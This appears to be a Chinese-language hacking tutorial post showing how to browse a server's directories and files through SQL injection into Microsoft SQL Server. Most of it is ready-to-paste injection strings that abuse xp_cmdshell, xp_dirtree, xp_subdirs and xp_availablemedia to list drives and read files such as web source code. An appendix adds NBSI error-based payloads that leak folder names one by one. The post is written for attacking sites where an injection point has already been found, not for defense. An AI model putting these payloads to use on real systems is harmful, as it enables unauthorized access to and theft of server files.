海外邮件中继，海外退信中继，美国高速VPS，不限流量VPN，邮局维护和管理，邮件网关，EMOS邮件中继，POSTFIX邮件中继，Winwebmail邮件中继,Winmail邮件中继,DBMail邮件中继,JDMail邮件中继,Exchange邮件中继,MDaemon邮件中继 淘宝店：http://shantan.taobao.com 云邮科技官网：www.yunrelay.com

【字体设置：大 中 小】
如何利用Sql 注入遍历目录  

关于如何取得注入入口不再说了，前面的帖子都说得很详细了，我们就如何浏览全部目录和文件进行研究
当System_user为"sa"时，具有全部权限，包括执行master.dbo.xp_cmdshell,如果这个存储过程没有改名或删除，我们可以利用它来遍历全部目录，执行如下：
先创建一个临时表：temp
'5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
接下来：
（1）我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中：
5';insert temp exec master.dbo.xp_availablemedia;--
我们可以通过查询temp的内容来获得驱动器列表及相关信息
（2）我们可以利用xp_subdirs获得子目录列表,并存入temp表中：
5';insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
（3）我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中：
5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
这样就可以成功的浏览到所有的目录（文件夹）列表：
如果我们需要查看某个文件的内容，可以通过执行xp_cmdsell：
5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
浏览temp就可以看到index.asp文件的内容了！
当然，如果xp_cmshell能够执行，我们可以用它来完成：
5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
通过xp_cmdshell我们可以看到所有想看到的，包括W3svc
5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'
但是，如果不是Admin的权限，我们还可以使用
5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
如果大家还有什么好的方法欢迎与我讨论研究


附: NBSI   磁盘目录读取代码：
1、drop table [jm_tmp];create table [jm_tmp](subdirectory nvarchar(400) NULL,depth tinyint NULL,[file] bit NULL)-- 创建表
2、delete [jm_tmp];Insert [jm_tmp] exec master..xp_dirtree 'C:\',1,1-- 将C盘的文件夹及文件插入到表中
3、and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(Select Top 1 [subdirectory],[file] From jm_tmp ORDER BY [file],[subdirectory]) T ORDER BY [file] desc,[subdirectory] desc)  '//暴出第一个文件夹名称
4、and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(Select Top 2 [subdirectory],[file] From jm_tmp ORDER BY [file],[subdirectory]) T ORDER BY [file] desc,[subdirectory] desc)  '//暴出第二个文件夹名称
5、and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(Select Top X [subdirectory],[file] From jm_tmp ORDER BY [file],[subdirectory]) T ORDER BY [file] desc,[subdirectory] desc)  '//暴出第X个文件夹或文件名称
6、drop table [jm_tmp]--删除此表

发表评论 - 不要忘了输入验证码哦！
作者：	用户：  密码：  我要注册 验证码：  为防止广告注册机程序,验证码不会自动显示,请点击此处显示或者(刷新)验证码!
评论： 禁止表情 禁止UBB 禁止图片 识别链接 识别关键字 确定发布？	最多可以输入200个字,目前你已经输入了0个字;你今日还可以发表10条评论!